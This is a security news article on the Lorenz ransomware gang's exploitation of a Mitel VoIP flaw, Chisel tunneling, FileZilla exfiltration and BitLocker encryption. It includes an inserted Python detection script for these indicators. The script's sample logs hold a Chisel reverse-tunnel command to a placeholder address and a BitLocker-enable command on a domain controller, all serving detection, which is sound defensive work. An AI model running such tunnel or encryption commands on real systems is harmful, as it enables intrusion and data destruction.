Lorenz Ransomware Gang Exploits Mitel VoIP Appliance Vulnerability in Attacks

The Lorenz ransomware group was seen exploiting a critical-severity vulnerability in Mitel MiVoice VoIP appliance for initial access into a victim’s network, cybersecurity firm Arctic Wolf reports.

Active since at least 2021, the Lorenz ransomware gang has been engaging in double-extortion activities: in addition to encrypting a victim’s files, the group exfiltrates data to pressure the victim into paying the ransom.

Last year, Lorenz was blamed for a cyberattack against electronic data interchange (EDI) provider Commport Communications. In 2022, the group was seen targeting small and medium businesses (SMBs) in the United States, China, and Mexico.

As part of a recent attack, Arctic Wolf Labs says, Lorenz exploited CVE-2022-29499, a remote code execution bug in MiVoice Connect, to gain a reverse shell to the victim’s network.

The observed tactics, techniques, and procedures (TTPs) resemble those in a June report from CrowdStrike detailing a ransomware gang’s intrusion that exploited the same vulnerability.

After initial compromise, Lorenz deployed a copy of the open source TCP tunneling tool Chisel and used it to move laterally in the environment.

However, Arctic Wolf Labs notes that the threat actor waited for about one month after compromising the Mitel device before performing any other malicious operations.

“We have medium confidence that the webshell was placed onto the device during the initial exploitation. This is based on no additional exploitation activity being observed upon returning to the Mitel device,” the cybersecurity firm notes.

Lorenz was seen using known tools to perform credential dumping and the follow-up network and domain enumeration activities. The gang then moved laterally using compromised credentials for two privileged administrator accounts, including one with domain admin privileges.

Prior to encrypting the victim’s files, the group exfiltrated data from the environment using the file-sharing application FileZilla. It then used the legitimate BitLocker tool to encrypt the victim’s files, by executing a crafted file directly on the domain controller.

“Although Lorenz primarily leveraged BitLocker for encryption, we observed a select few ESXi hosts with Lorenz ransomware,” Arctic Wolf Labs says.
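The post-exploitation chain described above (a Chisel tunnel, FileZilla for exfiltration, and BitLocker turned into the encryption tool on a domain controller) is the kind of sequence a detection engineer can hunt for in process-creation telemetry. The following is an added example, not code from the article, from Arctic Wolf, or from any vendor: it scans a handful of constructed log lines for those three indicators and escalates BitLocker enablement on a host listed as a domain controller. The log format, the host inventory, the account and host names and the IP address are all constructed assumptions; manage-bde is BitLocker's real command-line front end but is not named in the article.

```python
"""Added example: flag the Lorenz-style post-exploitation pattern in
constructed process-creation logs. Not code from the article or from
Arctic Wolf; log format, hosts, users and sample lines are all invented."""

import re

# Constructed log format (assumption):
#   <timestamp> host=<name> user=<name> image=<path> cmdline=<text>
# 'image' is matched non-greedily so paths containing spaces still parse.
LOG_RE = re.compile(
    r'^(?P<ts>\S+) host=(?P<host>\S+) user=(?P<user>\S+) '
    r'image=(?P<image>.+?) cmdline=(?P<cmd>.*)$'
)

# Assumed asset inventory: hosts that hold the domain controller role.
DOMAIN_CONTROLLERS = {"dc01"}

# Indicators drawn from the article's description of the intrusion.
RULES = [
    # Chisel TCP tunnel used for lateral movement.
    ("chisel_tunnel", lambda e: e["image"].lower().endswith("chisel.exe")
        or re.search(r'\bchisel\b.*\b(client|server)\b', e["cmd"], re.I)),
    # FileZilla launched on a server is unusual and matches the exfil step.
    ("filezilla_on_server", lambda e: "filezilla" in e["image"].lower()),
    # BitLocker being switched on via manage-bde (real Windows tool; the
    # article only says "BitLocker", the CLI name is an assumption here).
    ("bitlocker_enable", lambda e: e["image"].lower().endswith("manage-bde.exe")
        and re.search(r'(^|\s)-on\b', e["cmd"], re.I)),
]


def parse(line):
    """Return a field dict for a well-formed line, or None for anything else."""
    m = LOG_RE.match(line.strip())
    return m.groupdict() if m else None


def detect(lines, domain_controllers=DOMAIN_CONTROLLERS):
    """Walk the lines in order and return a list of alert dicts.

    Severity: 'critical' when BitLocker is enabled on a domain controller,
    'high' when it is enabled anywhere after a tunnel was already seen in
    the environment, 'medium' for every other single-indicator hit.
    """
    alerts = []
    tunnel_seen = False
    for line in lines:
        e = parse(line)
        if e is None:
            continue
        for name, pred in RULES:
            if not pred(e):
                continue
            severity = "medium"
            if name == "chisel_tunnel":
                tunnel_seen = True
            elif name == "bitlocker_enable":
                if e["host"] in domain_controllers:
                    severity = "critical"
                elif tunnel_seen:
                    severity = "high"
            alerts.append({"rule": name, "host": e["host"], "user": e["user"],
                           "ts": e["ts"], "severity": severity})
    return alerts


# Constructed sample telemetry; 203.0.113.5 is a documentation-range address.
SAMPLE_LOG = [
    r"2022-09-01T10:00:01Z host=mitel-gw user=root image=/usr/bin/bash cmdline=bash -c 'id'",
    r"2022-09-02T11:15:42Z host=ws-042 user=jdoe image=C:\Users\jdoe\AppData\Local\Temp\chisel.exe cmdline=chisel.exe client 203.0.113.5:8080 R:socks",
    r"2022-09-02T11:20:03Z host=ws-042 user=jdoe image=C:\Windows\System32\cmd.exe cmdline=cmd.exe /c whoami",
    r"2022-09-03T02:05:10Z host=fs01 user=svc_backup image=C:\Program Files\FileZilla FTP Client\filezilla.exe cmdline=filezilla.exe",
    r"2022-09-03T03:40:00Z host=dc01 user=admin_da image=C:\Windows\System32\manage-bde.exe cmdline=manage-bde.exe -on D: -UsedSpaceOnly -RecoveryPassword",
    r"2022-09-03T03:41:00Z host=dc01 user=admin_da image=C:\Windows\System32\manage-bde.exe cmdline=manage-bde.exe -status",
]


if __name__ == "__main__":
    for a in detect(SAMPLE_LOG):
        print(f'{a["ts"]} {a["severity"]:8} {a["rule"]:20} {a["host"]} ({a["user"]})')
```

Running it over the constructed lines yields three alerts: a medium hit for the Chisel client on the workstation, a medium hit for FileZilla on the file server, and a critical hit for manage-bde switching BitLocker on at the domain controller; the later `-status` query does not fire. The point of the ordering logic is that BitLocker on a non-DC host is noisy on its own, but becomes worth paging on once a tunneling tool has already appeared in the same telemetry stream.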

Organizations are advised to upgrade to Mitel MiVoice Connect version R19.3, which was released in July 2022 with patches for CVE-2022-29499.

Related: QNAP Warns of New ‘Deadbolt’ Ransomware Attacks Targeting NAS Users

Related: Mitel Devices Abused for DDoS Vector With Record-Breaking Amplification Ratio

Related: PetitPotam Vulnerability Exploited in Ransomware Attacks

Written By

Ionut Arghire is an international correspondent for SecurityWeek.
